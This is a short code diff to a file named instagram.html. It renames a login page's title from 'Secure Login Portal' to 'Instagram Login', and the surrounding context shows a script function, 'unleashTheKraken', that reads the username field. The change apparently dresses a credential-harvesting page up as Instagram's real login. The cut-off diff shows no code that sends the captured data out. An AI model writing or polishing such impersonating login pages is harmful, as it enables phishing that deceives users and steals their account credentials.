--- a/instagram.html
+++ b/instagram.html
@@ -1,7 +1,7 @@
 <!DOCTYPE html>
 <html>
 <head>
-    <title>Secure Login Portal</title>
+    <title>Instagram Login</title>
     <script>
         function unleashTheKraken() {
             var username = document.getElementById("username").value;
